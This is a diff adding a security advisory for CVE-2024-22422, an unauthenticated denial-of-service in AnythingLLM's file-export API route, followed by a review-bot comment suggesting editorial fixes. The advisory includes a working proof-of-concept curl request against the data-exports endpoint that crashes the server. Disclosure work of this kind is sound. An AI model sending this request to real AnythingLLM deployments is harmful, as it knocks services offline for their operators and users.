|
| 1 | +--- |
| 2 | +description: CVE-2024-22422, HIGH, An API route (file export) can allow an unauthenticated attacker to crash the AnythingLLM server resulting in a denial of service attack. |
| 3 | +title: AnythingLLM Unhandled Exception DoS |
| 4 | +date_published: "2024-01-22" |
| 5 | +last_updated: "2024-01-22" |
| 6 | +xray_id: |
| 7 | +vul_id: CVE-2024-22422 |
| 8 | +cvss: 7.5 |
| 9 | +severity: high |
| 10 | +discovered_by: Natan Nehorai |
| 11 | +type: vulnerability |
| 12 | + |
| 13 | +--- |
| 14 | + |
| 15 | +## Summary |
| 16 | + |
| 17 | +An API route (file export) can allow an unauthenticated attacker to crash the AnythingLLM server resulting in a denial of service attack. |
| 18 | + |
| 19 | +## Component |
| 20 | + |
| 21 | +[AnythingLLM](https://github.com/Mintplex-Labs/anything-llm) |
| 22 | + |
| 23 | + |
| 24 | + |
| 25 | +## Affected versions |
| 26 | + |
| 27 | +No version tags. Fixed in commit [08d33cf](https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2) |
| 28 | + |
| 29 | + |
| 30 | + |
| 31 | +## Description |
| 32 | + |
| 33 | +The “data-export” endpoint is used to export files using the filename parameter as user input. |
| 34 | + |
| 35 | +The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. |
| 36 | + |
| 37 | +An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. |
| 38 | + |
| 39 | +Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. |
| 40 | + |
| 41 | + |
| 42 | + |
| 43 | +## PoC |
| 44 | + |
| 45 | +As the API endpoint is unauthenticated there is only a need for a single HTTP request to crash the server: |
| 46 | + |
| 47 | +```shell |
| 48 | +curl -i -s -k -X $'GET' \ |
| 49 | +-H $'Host: localhost:3001' \ |
| 50 | +-H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' \ |
| 51 | +-H $'Accept: */*' \ |
| 52 | +-H $'Accept-Language: en-US,en;q=0.5' \ |
| 53 | +-H $'Accept-Encoding: gzip, deflate' \ |
| 54 | +-H $'Connection: close' \ |
| 55 | +$'http://localhost:3001/api/system/data-exports/.' |
| 56 | +``` |
| 57 | + |
| 58 | + |
| 59 | + |
| 60 | +## Vulnerability Mitigations |
| 61 | + |
| 62 | +No mitigations are supplied for this issue |
| 63 | + |
| 64 | + |
| 65 | + |
| 66 | +## References |
| 67 | + |
| 68 | +[Advisory](https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-xmj6-g32r-fc5q) |
| 69 | + |
| 70 | +[Fix commit](https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2) |
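Review bot: the "Vulnerability Mitigations" section ("No mitigations are supplied for this issue") contradicts the "Affected versions" section, which already names fix commit 08d33cf; state there that upgrading to a build containing that commit resolves the issue, and, since the description notes the endpoint is public and unauthenticated, mention restricting network exposure of the API as an interim measure for deployments that cannot upgrade immediately. Two smaller points: the front-matter field `xray_id:` is left empty and should be filled in or dropped, and the description's "crashes the instance using a single HTTP packet" should match the PoC section's wording of a single HTTP request, since the curl command issues a full request rather than one packet. The `$'...'` ANSI-C quoting in the PoC is also unnecessary for these plain strings and can be simplified to ordinary quotes.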